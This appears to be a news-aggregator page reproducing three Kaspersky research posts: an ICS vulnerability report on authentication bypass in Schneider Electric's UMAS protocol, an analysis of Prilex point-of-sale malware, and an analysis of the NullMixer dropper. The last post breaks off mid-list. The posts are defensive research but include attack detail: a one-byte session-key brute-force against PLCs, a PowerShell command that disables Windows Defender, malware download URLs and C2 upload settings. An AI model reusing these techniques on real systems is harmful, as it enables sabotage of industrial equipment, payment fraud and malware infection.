Kaspersky

Subscribe to Kaspersky hírcsatorna Kaspersky
Frissítve: 8 perc 4 másodperc
2022. szeptember 29.

The secrets of Schneider Electric’s UMAS protocol

UMAS (Unified Messaging Application Services) is a proprietary Schneider Electric (SE) protocol used to configure and monitor Schneider Electric PLCs. Schneider Electric controllers that use UMAS include Modicon M580 CPU (part numbers BMEP* and BMEH*) and Modicon M340 CPU (part numbers BMXP34*). Controllers are configured and programmed using engineering software – EcoStruxure™ Control Expert (Unity Pro), EcoStruxure™ Process Expert, etc.

In 2020, CVE-2020-28212, a vulnerability affecting this software, was reported, which could be exploited by a remote unauthorized attacker to gain control of a PLC with the privileges of an operator already authenticated on the controller. To address the vulnerability, Schneider Electric developed a new mechanism, Application Password, which should provide protection against unauthorized access to PLCs and unwanted modifications.

An analysis conducted by Kaspersky ICS CERT experts has shown that the implementation of the new security mechanism also has flaws. The CVE-2021-22779 vulnerability, identified in the course of the research, could allow a remote attacker to make changes to the PLC, bypassing authentication.

It was established that the UMAS protocol, in its implementation prior to the version in which the CVE-2021-22779 vulnerability was fixed, had significant shortcomings that had a critical effect on the security of control systems based on SE controllers.

By mid-August 2022, Schneider Electric had released an update for the EcoStruxure™ Control Expert software, as well as for Modicon M340 and Modicon M580 PLC firmware, that fixes the vulnerability.

This report describes:

  • the implementation of the UMAS protocol that does not use the Application Password security mechanism;
  • authentication bypass if Application Password is not enabled;
  • the principles on which the Application Password security mechanism is based;
  • mechanisms that can be used to exploit the CVE-2021-22779 vulnerability (authentication bypass where Application Password is configured);
  • operating principles of the updated device reservation mechanism.

A detailed report on the research, Schneider Electric measures designed to fix the authentication bypass vulnerability, and Kaspersky ICS CERT recommendations can be found in the full version of the article published on the Kaspersky ICS CERT website.

Object of research

UMAS (Unified Messaging Application Services) is Schneider Electric’s proprietary protocol used to configure, monitor, collect data and control Schneider Electric industrial controllers.

UMAS is based on a client-server architecture. During the research process, we used the EcoStruxure™ Control Expert PLC configuration software as the client part and a Modicon M340 CPU controller as the server part.

UMAS protocol Network packet structure

UMAS is based on the Modbus/TCP protocol.

Structure of the UMAS protocol

Specifications of the Modbus/TCP protocol include reserved Function Code values that developers can use according to their needs. A complete list of reserved values can be found in the official documentation.

Schneider Electric uses Function Code 90 (0x5A) to define that the value in the Data field is UMAS compliant.

The network packet structure is shown below, using a request to read a memory block (pu_ReadMemoryBlock) on the PLC as an example:

  • Red: Function Code 90 (0x5A)
  • Blue: Session Key 0 (0x00)
  • Green: UMAS Function 20 (0x20)
  • Orange: Data

Network packet structure

Each function includes a certain set of information in the Data field, such as offset from the base memory address, size of the data sent, memory block number, etc. For more details on the functions and session key, see the full version of the article.

Network communication

UMAS also inherits the Modbus client-server architecture. A structural diagram of the communication between the client and the server is provided below.

Communication between the client (EcoStruxure™ Control Expert) and server (PLC)

In a UMAS network packet, Function Code 0x5A is immediately followed by the Session Key.

UMAS network packet structure

Let’s examine the communication between a client and a server (a PLC, also referred to as “device” below) by analyzing a real-world traffic fragment. The screenshot below shows a packet containing the function umas_QueryGetComInfo(0x01) sent from the client (EcoStruxure™ Control Expert) to the server (the PLC).

Structure of the function:
TCP DATA – Modbus Header – 0x5A – session – 01(UMAS function code) – 00(data).

Network packet containing the function umas_QueryGetComInfo(0x01)

The device should send a response to each request received. The screenshot below shows the device’s response to the client’s request:

Server response

The status code is the status of the device’s execution of the function sent to it by the client in the previous request. The value “fe” corresponds to successful execution of the function; “fd” indicates an error. The status code is present in each response sent by the device to thecontaining a function. It is always located immediately after the session key.

Reservation procedure

A “reservation” procedure is required to make changes to a PLC. The procedure acts as authentication. Only one client (e.g., an engineering workstation) can reserve a device at any specific time for configuration or status monitoring. This is required to prevent changes from being made to a device in parallel without coordination.

The screenshot below shows a request from the engineering software to the PLC to perform the device reservation procedure in its basic variant that does not use the Application Password security mechanism.

Device reservation

The umas_QueryTakePLCReservation(0x10) function is used to reserve a device. The request containing this function includes the name of the client reserving the device and a value equal to the length of that name.

CVE-2020-28212: authentication bypass without Application Password

The main issue with the basic reservation mechanism that does not use Application Password is that an attacker can use the session key to send requests and change the device’s configuration.

In firmware versions prior to 2.7 for Modicon M340 devices, the session key has the same value each time the device is reserved, and is equal to “0x01”. This means that attackers can make changes on the device by calling the relevant functions after the device has been reserved by a legitimate user.

The attack workflow is shown in the diagram below:

Remote threat actor attack workflow. Modicon M340 firmware prior to version 2.7, device reserved by an engineer

If the device has not been reserved at the time of an attack, the attacker can use the umas_QueryTakePLCReservation(0x10) function to reserve the device in order to make changes to it.

With Modicon M340 firmware version 2.7 or later, the session key takes a random value after device reservation. However, the session key is one byte in length, which means there are only 256 possible session ID values. This enables a remote unauthorized attacker to brute-force an existing ID of a session between a legitimate user and the PLC.

To carry out this type of attack, a remote attacker needs to send a series of network requests on port 502/TCP of the PLC with different session ID values and look at responses returned by the PLC. If the correct session ID was sent, the attacker will get the status code 0xfe, which means the request was fulfilled successfully. Otherwise, the attacker will get the status code 0xfd.

The operations described above can be implemented using any programming language – an attacker does not have to use EcoStruxure™ Control Expert or any other dedicated software to communicate with the device.

Application Password

To mitigate the CVE-2020-28212 vulnerability, exploitation of which could allow a remote unauthorized attacker to gain control of the PLC with the privileges of an operator already authenticated on the PLC, Schneider Electric developed a new security mechanism that used cryptographic algorithms to compute the session ID and increased the session ID length. Schneider Electric believed implementing this security mechanism would prevent brute-force attacks that could be used to crack single-byte session IDs.

The new mechanism was introduced starting with firmware version 3.01 for Modicon M340 devices. To implement authentication between the client and the device, Application Password needs to be enabled in project settings (“Project & Controller Protection”). The mechanism is designed to provide protection against unauthorized access, unwanted changes, as well as unauthorized downloading or uploading of PLC strategies.

After activating the mechanism using EcoStruxure™ Control Expert, the client needs to enter the password when connecting to a device as part of the reservation procedure. Application Password also makes changes to the reservation mechanism itself.

An analysis conducted by Kaspersky ICS CERT experts has shown that the implementation of the new security mechanism was, unfortunately, also flawed. Its main shortcoming is that during the authentication process, all computations are performed on the client side, i.e., on the side of EcoStruxure™ Control Expert engineering software. The vulnerability identified during research, CVE-2021-22779, could allow a remote attacker to bypass authentication and use functions that require reservation to make changes to the PLC.

For more details on the implementation of Application Password and on the security flaws identified by Kaspersky ICS CERT researchers, read the full version of the article published on the Kaspersky ICS CERT website. For more information, you can also contact us at ics-cert@kaspersky.com.

2022. szeptember 28.

Prilex: the pricey prickle credit card complex

Prilex is a Brazilian threat actor that has evolved out of ATM-focused malware into modular point-of-sale malware. The group was behind one of the largest attacks on ATMs in the country, infecting and jackpotting more than 1,000 machines, while also cloning in excess of 28,000 credit cards that were used in these ATMs before the big heist. But the criminals’ greed had no limits: they wanted more, and so they achieved it.

Active since 2014, in 2016, the group decided to give up ATM malware and focus all of their attacks on PoS systems, targeting the core of the payment industry. These are criminals with extensive knowledge of the payment market, and EFT software and protocols. They quickly adopted the malware-as-a-service model and expanded their reach abroad, creating a toolset that included backdoors, uploaders and stealers in a modular fashion. Since then, we have been tracking the threat actor’s every move, witnessing the damages and great financial losses they brought upon the payments industry.

The Prilex PoS malware evolved out of a simple memory scraper into very advanced and complex malware, dealing directly with the PIN pad hardware protocol instead of using higher level APIs, doing real-time patching in target software, hooking operating system libraries, messing with replies, communications and ports, and switching from a replay-based attack to generate cryptograms for its GHOST transactions even from credit cards protected with CHIP and PIN technology.

It all started with ATMs during a carnival celebration

During the carnival of 2016, a Brazilian bank realized that their ATMs had been hacked, with all the cash contained in those machines stolen. According to reports from law enforcement agencies, the criminals behind the attack were able to infect more than 1,000 machines belonging to one bank in the same incident, which allowed them to clone 28,000 unique credit cards across Brazil.

The attackers did not have physical access to the machines, but they were able to access the bank’s network by using a DIY device containing a 4G router and a Raspberry PI. By opening a backdoor, they were able to hijack the institution’s wireless connection and target ATMs at will. After obtaining initial network access, the attacker would run a network recognition process to find the IP address of each of the ATMs. With that information in hand, the attackers would launch a lateral movement phase, using default Windows credentials and then installing custom-crafted malware in the desired systems. The backdoor would allow the attacker to empty the ATM socket by launching the malware interface and typing a code supplied by the mastermind, the code being specific to each ATM being hacked.

ATM infected with Prilex ready to dispense money

The malware used in the attack was named Prilex and had been developed from scratch by using privileged information and advanced knowledge of the ATM network. To control the ATMs, Prilex did patch in legitimate software for jackpotting purposes. Besides its capability to perform a jackpot, the malware was also capable of capturing information from magnetic strips on credit and debit cards inserted into the infected ATMs. Afterwards, this valuable information could be used to clone cards and steal further funds from the bank’s clients.

Evolving into PoS malware

Prilex has evolved out of ATM-focused malware into modular point-of-sale malware targeting payment systems developed by Brazilian vendors, the so-called EFT/TEF software. As we noted in 2018, there are many similarities between their ATM and PoS versions. Their first PoS malware was spotted in the wild in October 2016. The first two samples had 2010/2011 as the compilation date, as shown on the graph below. However, we believe that invalid compilation dates were set due to incorrect system date and time settings. In later versions, the timestamps corresponded to the times when the samples were discovered. We also noticed that in the 2022 branch, the developers started using Subversion as the version control system.

Versions of the Prilex PoS malware: 3 new versions in 2022 (download)

As we see on the graph, Prilex was highly active in 2020, but suddenly disappeared in 2021, resurfacing in 2022 with a release of three new variants.

The PoS version of Prilex is coded in Visual Basic, but the stealer module, described in this article, is in p-code. In a nutshell, this is an intermediate step between high-level instructions in a Visual Basic program and the low-level native code executed by a CPU. Visual Basic translates p-code statements into native code at runtime.

A link to the past

Prilex is not the only type of PoS malware to originate in Brazil. We saw a weak link with the old Trojan-Spy.Win32.SPSniffer, which we described in 2010: both families are able to intercept signals from PIN pads, but use different approaches in doing so.

PIN pads are equipped with hardware and security features to ensure that security keys are erased if someone tries to tamper with the device. In fact, the PIN is encrypted in the device upon entry using a variety of encryption schemes and symmetric keys. Most often, this is a triple DES encoder, making it hard to crack the PIN.

There is a problem, though: these devices are always connected to a computer via a USB or serial port, which communicates with the EFT software. Older and outdated PIN pad devices use obsolete and weak cryptography schemes, making it easy for malware to install a USB or serial port sniffer to capture and decrypt the traffic between the PIN pad and the infected system. This is how SPSniffer gets credit card data. Sometimes the traffic is not even encrypted.

SPSniffer: serial port sniffer allowing capture of not-encrypted traffic

The main approach used by Prilex for capturing credit card data is to use a patch in the PoS system libraries, allowing the malware to collect data transmitted by the software. The malware will look for the location of a particular set of executables and libraries in order to apply the patch, thus overwriting the original code. With the patch in place, the malware collects the data from TRACK2, such as the account number and expiration date, in addition to other cardholder information needed to perform fraudulent transactions.

Initial infection vector

Prilex is not a widespread type of malware, as it is not distributed through email spam campaigns. It is highly targeted and is usually delivered through social engineering, e.g., a target business may receive a call from a “technician” who insists that the company needs to update its PoS software. The fake technician may visit the target in person or request the victims to install AnyDesk and provide remote access for the “technician” to install the malware.

Warning from a PoS vendor about Prilex social engineering attacks

Messing with the EMV standard

Brazil began migrating to EMV in 1999, and today, nearly all cards issued in the country are chip enabled. A small Java-based application lives inside the chip and can be easily manipulated in order to create a “golden ticket” card that will be valid in most—if not all—point-of-sale systems. This knowledge has enabled the criminals to upgrade their toolset, allowing them to create their own cards featuring this new technology and keeping them “in the business.”

The initial versions of Prilex were capable of performing the “replay attack,” where, rather than breaking the EMV protocol, they instead took advantage of poor implementations. Since payment operators fail to perform some of the validations required by the EMV standard, criminals can exploit this vulnerability within the process to their benefit.

In this kind of attack, fraudsters push regular magnetic stripe transactions through the card network as EMV purchases, as they are in control of a payment terminal and have the ability to manipulate data fields for transactions put through that terminal. Later they switched to capturing traffic from real EMV-based chip card transactions. The thieves could insert stolen card data into the transaction stream, while modifying the merchant and acquirer bank account on the fly.

Brazilian cybercriminals have successfully launched replay attacks since at least 2014. As pointed out by Brian Krebs, a small financial institution in New England battled some $120,000 in fraudulent charges from Brazilian stores within less than two days. The bank managed to block $80,000, but the bank’s processor, which approves incoming transactions when the core systems are offline, let through the other $40,000. All of the fraudulent transactions were debit charges. All of them came across MasterCard’s network and appeared to be chip transactions without a PIN to MasterCard’s systems.

Also worth mentioning is the attack against a German bank in 2019, which registered €1.5 million in losses and used the same technique. The Prilex gang claimed responsibility. Judging by the name fields and the functionality of the tool, they probably used the software they are selling in the black market.

To automate attacks using cloned credit cards, Prilex criminals used tools like Xiello, discovered by our telemetry in 2020. This tool allows the cybercriminals to use credit cards in a batch when making fraudulent purchases. It sends the purchase data to credit card acquirers, who then approve or deny the transactions.

Xiello tool used by Prilex to automate transactions

As the payment industry and credit card issuers fixed EMV implementation errors, replay attacks became obsolete and ineffective, pushing the Prilex gang to innovate and adopt other ways of credit card fraud.

From “Replay” to “Ghost”

The latest versions of Prilex show certain differences to previous ones in the way the attack occurs: the group has switched from the replay attacks to fraudulent transactions using cryptograms generated by the victim card during the in-store payment process, referred to by the malware authors as “GHOST transactions.”

In these attacks, the Prilex samples were installed in the system as RAR SFX executables that extracted all required files to the malware directory and executed the installation scripts (VBS files). From the installed files, we can highlight three modules used in the campaign: a backdoor, which is unchanged in this version except for the C2 servers used for communication; a stealer module; and an uploader module.

Prilex methods of maintaining persistence

The stealer module is responsible for intercepting all communications between the point-of-sale software and the PIN pad used for reading the card during the transaction. Once it identifies a running transaction, the malware will intercept and modify the content of the transaction in order to be able to capture the card information and to request new EMV cryptograms to the victim’s card. These cryptograms are then used in the GHOST transactions.

Method used to parse the PIN pad messages sent/received

In order to target a specific process, the criminals will perform an initial screening of the machine—to check if it is an interesting target with enough credit card transactions and to identify the process they will target.

After the process is identified, the malware will move forward to install the hooks needed to intercept the transaction information. As the communication between the PoS software and the card reader happens through the COM port, the malware will install a hook to many Windows APIs inside the targeted process, aiming to monitor and change data as needed. Interestingly enough, instead of allocating memory to the hook procedure, Prilex finds free space within the modules memory, a technique called code cave, making it hard for some security solutions to detect the threat in an infected system.

Hook code added into CloseHandle process

All captured information from the transaction is saved to an encrypted file placed in a directory previously set by the malware configuration. Those files will later be sent to the malware C2 server, allowing the cybercriminals to make transactions through a fraudulent PoS device registered in the name of a fake company.

Captured credit card data that will be later sent to the operator server

The previous version monitored the transaction in order to get the cryptogram, generated by the card for the original transaction, and then to perform a replay attack using the collected cryptogram. In this case, the cryptogram has the same ATC (Application Transaction Counter), allowing the fraudulent transaction to be identified by the reuse of the ATC as well as the fact that the date inside the cryptogram did not match the date when it was submitted, as the fraudulent transactions were submitted at a later point in time.

In GHOST attacks performed by the newer versions of Prilex, it requests new EMV cryptograms after capturing the transaction. These cryptograms will then be used in a fraudulent transaction through one of the cybercrime tools whose output log can be seen below.

[START GHOST] _ 80CA9F17 | 9F1701039000 | 002000800826435643FFFFFFFF | Check PIN 9000 _| 80AE80001D00000000010000000000000000760000008000098620060600B4E5C6EB -> Generate AC 80128000AA5EA486052A8886DE06050A03A4B8009000 -> Generated ARQC [END GHOST]

The table above shows the data collected from the malware. It contains the Authorization Request Cryptogram (ARQC) that was generated by the card and should now be approved by the card issuer. After dissecting the response (80128000AA5EA486052A8886DE06050A03A4B8009000), we have the following information.

Data Field details 80 12 Size of the response: 18 bytes 80 Cryptogram Information Data: ARQC (Authorization Request Cryptogram): go and ask the issuer 00AA ATC: Application Transaction Counter 5EA486052A8886DE Application Cryptogram 06050A03A4B800 Issuer Application Data 9000 Response OK

Multiple application cryptograms are applied to the card, where the amount of the transaction (blue), ATC (green) and the generated cryptogram (red) change for each transaction.

[START GHOST] 80CA9F179F1701039000002000800826435643FFFFFFFF900080AE80001D00000000010000000000000000760000008000098620060600B4E5C6EB80128000AA5EA486052A8886DE06050A03A4B8009000
[END GHOST] [START GHOST] 80CA9F179F1701039000002000800826435643FFFFFFFF900080AE80001D00000000100000000000000000760000008000098620060600E22CB55580128000AB8E988F00ACEE5D4806050A03A4B8009000
[END GHOST] [START GHOST] 80CA9F179F1701039000002000800826435643FFFFFFFF900080AE80001D0000000020000000000000000076000000800009862006060007EBA76480128000AC5E1E75557CC57E1206050A03A4B8009000
[END GHOST] [START GHOST] 80CA9F179F1701039000002000800826435643FFFFFFFF900080AE80001D000000003000000000000000007600000080000986200606002598491680128000ADCF54C11A58083ADB06050A03A4B8009000
[END GHOST]

In a nutshell, this is the entire Prilex scheme:

Prilex: from infection to cashout

Backdoor module

The backdoor has many commands, and aside from memory scanning common to memory scrappers, older (ATM) Prilex versions also featured a command to debug a process and peek into its memory. It is highly likely that this was used to understand target software behavior and perform adjustments on the malware or environment to perform fraudulent transactions. Older versions of Prilex performed patching on specific software libraries, whereas newer samples do not rely on specific software anymore and will instead hook Windows APIs to perform its job.

The Prilex debugger

Here’s a list of commands used in the ATM version of Prilex, which include debugging:

Reboot, SendKeys, ShowForm, Inject, UnInject, HideForm, Recursos, GetZip, SetStartup, PausaProcesso, LiberaProcesso, Debug, SendSnapShot, GetStartup, CapRegion, CapFerro, KillProcess, Shell, Process, GetModules, GetConfig, StartSendScreen, StopSendScreen, ReLogin, StartScan, GetKey, SetConfig, RefreshScreen, Download, TakeRegions, Enviar Arquivo, ScanProcessStart, ScanProcessStop, StartRegiao, StopRegiao, StartDownload, StopDownload.

Even though a new set of commands has been added to the PoS version, we could find some of those from the ATM attack still being used. Numerous available commands are for general use, allowing the criminals to collect information about the infected machine.

Command Description Download Download a file from the remote server Shell Execute a specified command via CMD GetConfig Get the configuration file KillProcess Terminate a process SetStartup Add the process to a startup registry key StartSendScreen Start screen capture StopSendScreen Stop screen capture Uploader Module

This module is responsible for checking the directory specified in the CABPATH parameter in the config file and sending all cab files generated from the stolen transactions to the server; the files are sent through an HTTP POST request. The endpoint used by the module is also mentioned in the uploader configuration file.

[SNDCAB] CABHOST=C2 CABPORT=80 CABPAGE=/upload.php CABPATH=c:\cab

The use of this module indicates a change in the group’s operation structure, since in the previous version, the collected information was sent to a server whose address was hardcoded into the stealer code, and the module used the same protocol as the backdoor. This uploader allows the operator to set the endpoint for the collected information as indicated in the configuration file; judging from the samples analyzed, it is possible to see a different infrastructure involved in the process.

Captured data stored in the uploader C2

Malware-as-a-service

In 2019, a website claiming to be affiliated with Prilex started offering what it said was a malware package created by the group. We have little confidence in these claims: the site could be operated by copycats trying to impersonate the group and catch some money using the reputation Prilex has earned over the years.

This website was still up and running at the time of writing this.

The asking price for what is supposedly a Prilex PoS kit is $3,500.

The website says its owners have worked with Russian cybercriminals in the past, another claim we cannot confirm. Worth mentioning, too, is that our Digital Footprint Intelligence service found citations of a Prilex malware package sold through Telegram chats, in an underground channel, priced between €10,000 and $13,000. We have no way of confirming that what is being offered is the real Prilex malware.

At the same time, Prilex now using Subversion is a clear sign they are working with more than one developer.

Conclusions

The Prilex group has shown a high level of knowledge about credit and debit card transactions, and how software used for payment processing works. This enables the attackers to keep updating their tools in order to find a way to circumvent the authorization policies, allowing them to perform their attacks.

Over years of activity, the group has changed its attack techniques a lot. However, it has always abused processes relating to PoS software to intercept and modify communications with the PIN pad. Considering that, we strongly suggest that PoS software developers implement self-protection techniques in their modules, such as the protection available through our Kaspersky SDK, aiming to prevent malicious code from tampering with the transactions managed by those modules. To credit card acquirers and issuers, we recommend avoiding “security by obscurity”: do not underestimate the fraudster. All EMV validations must be implemented!

Prilex’s success is the greatest motivator for new families to emerge as fast-evolving and more complex malware with a major impact on the payment chain.

To financial institutions who fell victims to this kind of fraud, we recommend our Kaspersky Threat Attribution Engine to help IR teams with finding and detecting Prilex files in attacked environments.

The Prilex family is detected by all Kaspersky products as HEUR:Trojan.Win32.Prilex and HEUR:Trojan.Win64.Prilex. More details about the threat and a full analysis is available to customers of our Threat Intelligence Reports. With any requests about our private reports, please contact crimewareintel@kaspersky.com.

2022. szeptember 26.

NullMixer: oodles of Trojans in a single dropper

Executive Summary

NullMixer is a dropper leading to an infection chain of a wide variety of malware families. NullMixer spreads via malicious websites that can be found mainly via search engines. These websites are often related to crack, keygen and activators for downloading software illegally, and while they may pretend to be legitimate software, they actually contain a malware dropper.

It looks like these websites are using SEO to stay at the top of search engine results, making them easy to find when searching the internet for “cracks” and “keygens”. When users attempt to download software from one of these sites, they are redirected multiple times, and end up on a page containing the download instructions and archived password-protected malware masquerading as the desired piece of software. When a user extracts and executes NullMixer, it drops a number of malware files to the compromised machine. These malware families may include backdoors, bankers, credential stealers and so on. For example, the following families are among those dropped by NullMixer: SmokeLoader/Smoke, LgoogLoader, Disbuk, RedLine, Fabookie, ColdStealer.

Technical Details Initial infection

The infection vector of NullMixer is based on a ‘User Execution’ (MITRE Technique: T1204) malicious link that requires the end user to click on and download a password-protected ZIP/RAR archive with a malicious file that is extracted and executed manually.

The whole infection chain of NullMixer is as follows:

  • The user visits a website to download cracked software, keygens or activators. The campaign appears to target anyone looking to download cracked software, and uses SEO techniques to make these malicious sites more prominent at the top of search engine results.

    Top Google search engine results for “crack software” contain malicious websites delivering NullMixer

  • The user clicks on the download link for the desired software.
  • The link redirects the user to another malicious website.
  • The malicious website redirects the user to a third-party IP address webpage.
  • The webpage instructs the user to download a password-protected ZIP file from a file sharing website.

    Malware execution instructions

  • The user extracts the archived file with the password.
  • The user runs the installer and executes the malware.

    Example of NullMixer infection chain execution

NullMixer description

NullMixer is a dropper that includes more than just specific malware families; it drops a wide variety of malicious binaries to infect the machine with, such as backdoors, bankers, downloaders, spyware and many others.

NullMixer execution chain

The real infection occurs when the user extracts the ‘win-setup-i864.exe’ file from the downloaded password-protected archive and runs it. The ‘win-setup-i864.exe’ file is an NSIS (Nullsoft Scriptable Install System) installation program, which is a very popular installation instrument used by many software developers. In our case, it dropped and launched another file, ‘setup_installer.exe’, that is in fact an SFX archive ‘7z Setup SFX’ wrapped into a Windows executable. The ‘setup_installer.exe’ file dropped dozens of malicious files. But instead of launching them, it launches a single executable – setup_install.exe – which is a NullMixer starter component. NullMixer’s starter launches all the dropped executable files. To do so, it contains a list of hardcoded file names, and launches them one by one using ‘cmd.exe’.

List of files hardcoded into NullMixer starter component

NullMixer execution chain

It also tries to change Windows Defender settings using the following command line.

"cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set- MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable"

Immediately after all the dropped files have been launched, the NullMixer starter beacons to the C&C about a successful installation. From this point, all the dropped and launched malicious files are left to their own devices. With a little monitoring we can identify a wide variety of malicious binaries that are spread by the NullMixer malware.

NullMixer and malware families it drops

Since the number of families turned out to be quite large, we decided to give only a brief description of each in this report. A full technical description will be provided in subsequent reports.

SmokeLoader

SmokeLoader (aka Smoke) is a modular malware that has been known since 2011, distributed via phishing emails and drive-by downloads. It has evolved its capabilities with additional modules over the years. For example, disabling of Windows Defender and anti-analysis techniques have been added to the malware. However, most threat actors only use the main functionality – payload downloading and executing.

In contrast to the simplest downloaders that download malicious files using hardcoded static URLs, SmokeLoader communicates with the C&C in order to receive and perform download tasks.

RedLine Stealer

RedLine Stealer has been known since early 2020 and developed through 2021. The malware is known to be sold on online forums, and distributed via phishing emails.

A newer method of spreading RedLine Stealer is by luring Windows 10 users to get fake Windows 11 upgrades. When the user downloads and executes the binary, they’re actually running the malware.

RedLine’s main purpose is to steal credentials and information from browsers, in addition to stealing credit card details and cryptocurrency wallets from the compromised machine. Moreover, the malware also collects information about the system, such as: username, hardware details and installed security applications.

PseudoManuscrypt

PseudoManuscrypt has been known since June 2021, and used as MaaS (Malware as a Service). PseudoManuscrypt doesn’t target particular companies or industries, but it has been observed that industrial and government organizations, including enterprises in the military-industrial complex and research laboratories, are the most significant victims.

The malware is known to be distributed via other botnets such as Glupteba. The main aim of the PseudoManuscrypt threat actors is to spy on their victims by stealing cookies from Firefox, Google Chrome, Microsoft Edge, Opera, and Yandex Browser, keylogging and stealing cryptocurrency by utilizing the ClipBanker plugin. A distinctive feature of the malware is the use of the KCP protocol to download additional plugins.

ColdStealer

ColdStealer is a relatively new malicious program that was discovered in 2022. Like many other stealers its main purpose is to steal credentials and information from web browsers, in addition to stealing cryptocurrency wallets, FTP credentials, various files and information about the system such as OS version, system language, processor type and clipboard data. The only known method of delivering stolen information to cybercriminals is by sending a ZIP archive to an embedded control center.

ColdStealer Main() function

FormatLoader

FormatLoader is a downloader that got its name for using hardcoded URLs as format strings, where it needs to fill a single digit to get a link to download an additional binary. The available digit range is also hardcoded.

https://signaturebusinesspark[.]com/360/fw%d.exe => https://signaturebusinesspark[.]com/360/fw3.exe https://signaturebusinesspark[.]com/360/fw%d.exe => https://signaturebusinesspark[.]com/360/fw4.exe … https://signaturebusinesspark[.]com/360/fw%d.exe => https://signaturebusinesspark[.]com/360/fw6.exe

FormatLoader’s main purpose is to infect the machine with an additional malicious file by downloading the binary to the compromised machine. To do so, the malware adds digits from the hardcoded range one by one to the hardcoded format strings, and accesses the download links.

In addition, FormatLoader uses a third-party website service for tracking the compromised machine. It sends a ‘GET’ request to a specific URL of an IP logger service, which collects information such as IP address and IP-based geolocation.

CsdiMonetize

CsdiMonetize is known to be an advertising platform that used to install many different PUAs (Potentially Unwanted Applications) on a Pay-Per-Install basis after infecting the user’s machine. Later on, rather than just infecting their victim with PUAs, CsdiMoneitze began infecting their victims with actual Trojans, like the Glupteba malware.

Nowadays, CsdiMonetize infects its victims with additional malware family types such as: Fabookie, Disbuk, PseudoManuscrypt and more.

Csdi execution chain

The infection begins with NSIS installer ’61f665303c295_Sun1059d492746c.exe’, which downloads the Csdi installer ‘MSEkni.exe‘. The Csdi installer requests the current configuration from the C&C and a list of additional Csdi components to install. Configuration is stored in several registry keys in encrypted and base64 encoded form. The next step is to download additional components, the most notable being publisher and updater components. The Csdi publisher component is responsible for showing advertisements by launching the browser with URLs as command line parameters. The updater component is responsible for a Pay-Per-Install service. It receives the list of URLs from the C&C and instructions on how to drop and execute downloaded files.

Disbuk

Disbuk (aka Socelar) is known to disguise itself as a legitimate application, such as PDF editor software.

This malware was found to mainly target Facebook Ads and evolved to steal Facebook session cookies from Chrome and Firefox by accessing the browser’s SQLite database. After retrieving this information, the malware attempts to extract additional information like access tokens, account IDs, etc. After further evolution, Disbuk has also started retrieving Amazon cookies.

Besides stealing data, Disbuk also installs a malicious browser extension that masquerades as a Google Translate extension. To get more information about a user’s Facebook account, Disbuk queries Facebook Graph API.

Fabookie

Fabookie is another stealer that targets Facebook Ads. Its functionality is similar to the Disbuk malware, and includes stealing Facebook session cookies from browsers, using Facebook Graph API Queries to receive additional information about a user’s account, linked payment method, balance, friends, etc. Stolen credentials can later be used to run ads from the compromised account.

Unlike Disbuk, this malware does not contain built-in malicious browser extensions, but contains two embedded NirSoft utilities – ‘Chrome Cookies View’ and ‘Web Browser Password Viewer’ – that are used to extract data from browsers.

DanaBot

DanaBot is a Trojan-Banker written in Delphi that spreads via email phishing, and is known to have evolved since it was discovered in 2018.

DanaBot is a modular malware that includes various additional modules; the most popular functionalities of these modules are stealing information from compromised machines and injecting fake forms into popular ecommerce and social media sites to collect payment data. It can also provide full access to infected systems with remote desktop, or mouse and keyboard access by utilizing a VNC plugin.

Racealer

Racealer (aka RaccoonStealer) is known to be a stealer-type malware that mostly extracts user credentials and exfiltrates data from compromised machines.

Racoon is also known to have evolved over the years since it was discovered in 2019. For example, it now uses Telegram to retrieve C&C IP addresses and malware configurations. Moreover, additional modules are now being downloaded from the malware’s C&Cs that are also used to extract credentials.

Generic.ClipBanker

Generic.ClipBanker is a clipboard hijacker malware that monitors the clipboard of the compromised machine, and specifically searches for cryptocurrency addresses in order to replace them. When a user copies an address of a cryptocurrency wallet the malware replaces the address of the wallet with their own cryptocurrency wallet address, so the end user sends cryptocurrencies (such as Bitcoin) to them rather than to the intended wallet address.

Screen with cryptocurrency addresses from Generic.ClipBanker binary

SgnitLoader

The SgnitLoader is a small Trojan-Downloader written in C#. The downloader binary size is about 15 Kbytes. However, the original file is packed with Obsidium, which makes the binary size grow to more than 400 Kbytes.

The SgnitLoader contains a few hardcoded domains in its binary, to which it appends the path and adds a number from 1 to 7. Unlike the FormatLoader malware, it doesn’t use a format string, but simply adds a number to the end of the string in order to get the full URL.

"https://presstheme[.]me/" + "?user=" + "l10_" + "1" => "https://presstheme.me/?user=l10_1" "https://presstheme[.]me/" + "?user=" + "l10_" + "2" => "https://presstheme.me/?user=l10_2" … "https://presstheme[.]me/" + "?user=" + "l10_" + "7" => "https://presstheme.me/?user=l10_7"

After the download and execute procedures are completed, SgnitLoader pings back to the C&C with a ‘GET’ request. The original pingback URL is hidden with the ‘iplogger.org’ URL shortener service.

ShortLoader

Another small Trojan-Downloader written in C#. Its binary is half the size of SgnitLoader. Its main function code is fairly short and it uses the ‘IP Logger‘ URL shortener service to hide the original URL that it downloads the payload from. That’s why it’s called ShortLoader.

ShortLoader Main() function

Downloader.INNO

The original file is an ‘Inno Setup’ installer that utilizes ‘Inno Download Plugin’ download functionality.
The setup script is programmed to download a file from the URL ‘http://onlinehueplet[.]com/77_1.exe‘ placing it into the ‘%TEMP%‘ directory as ‘dllhostwin.exe‘ and executing it with the string ’77’ as an argument.

Part of Inno Setup installation script

The downloaded file belongs to the Satacom Trojan-Downloader family. However, in the course of our research we discovered that this file was replaced on the server with legitimate PuTTY software, a popular SSH client.

LgoogLoader

This file is another software installer that uses the Microsoft Cabinet archive-file format. After execution, it drops three files: a batch file, an AutoIt interpreter with a stripped executable header and an AutoIt script. Then it executes the batch file with ‘cmd.exe’. The task of the batch file is to restore the AutoIt interpreter executable, and launch it with a path to the AutoIt script as a command line argument.

AutoIt script performs a few AntiVM and AntiDebug checks. If all the checks are successful, then it starts AutoIt interpreter once again, decrypts and decompresses the embedded executable and injects it into the newly created process. The injected executable is LgoogLoader.

LgoogLoader is a Trojan-Downloader that downloads an encrypted configuration file from a hardcoded static URL. It then decrypts the configuration, extracts additional URLs from it and downloads and executes the final payloads. It was called LgoogLoader due to its use of strings from ‘Google Privacy Policy’.

Google Privacy Policy strings in LgoogLoader’s binary

Downloader.Bitser

